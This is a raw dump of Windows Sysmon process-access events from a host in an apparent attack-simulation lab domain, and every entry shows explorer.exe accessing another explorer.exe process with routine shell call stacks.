16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 